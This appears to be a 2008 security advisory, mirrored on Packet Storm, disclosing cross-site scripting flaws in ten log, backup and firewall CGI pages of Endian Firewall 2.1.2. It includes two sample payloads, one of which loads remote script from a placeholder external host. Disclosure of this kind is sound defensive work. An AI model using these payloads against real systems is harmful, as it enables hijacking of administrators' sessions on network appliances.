The Endian firewall version 2.1.2 suffers from cross site scripting vulnerabilities.
1f0d21c5eccd7166bf9aafc3ee4c981a067dce5a155cd4e3c10e9d78fbb1c0f3#Security Advisory - Multiple Vulnerabilities in Endian firewall#
Endian Firewall is a "turn-key" linux security distribution that turns every system into a full featured security appliance. It features stateful packet filtering, proxies, antivirus/antispam, content filtering and a VPN module.
Date : 02-12-2008
Product : Endian Firewall
Version : 2.1.2 - Prior version maybe also be affected
Vendor : http://www.endian.com/en/
Author : syniack
Contact : syniack@gmail.com
S.Page : http://bsecure.net.pk
XSS Vulnerability: [TESTED]
Security issue in the following files:
https://example:10443/cgi-bin/logs_siproxy.cgi
https://example:10443/cgi-bin/logs_clamav.cgi
https://example:10443/cgi-bin/logs_smtp.cgi
https://example:10443/cgi-bin/logs_log.cgi
https://example:10443/cgi-bin/logs_proxy.cgi
https://example:10443/cgi-bin/logs_firewall.cgi
https://example:10443/cgi-bin/logs_ids.cgi
https://example:10443/cgi-bin/logs_dansguardian.cgi
https://example:10443/cgi-bin/backup.cgi
https://example:10443/cgi-bin/outgoingfw.cgi
Example:
"><script src=http://www.example.com/re.js></script>
"><script>alert(1);</script>
Image Example Url:
http://img158.imageshack.us/my.php?image=endian02122008yu3.jpg
http://img150.imageshack.us/my.php?image=endian03122008openvpnxq5.jpg
http://img201.imageshack.us/my.php?image=endian05122008backupat3.jpg
http://img201.imageshack.us/my.php?image=endian06122008outgoingfla5.jpg
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed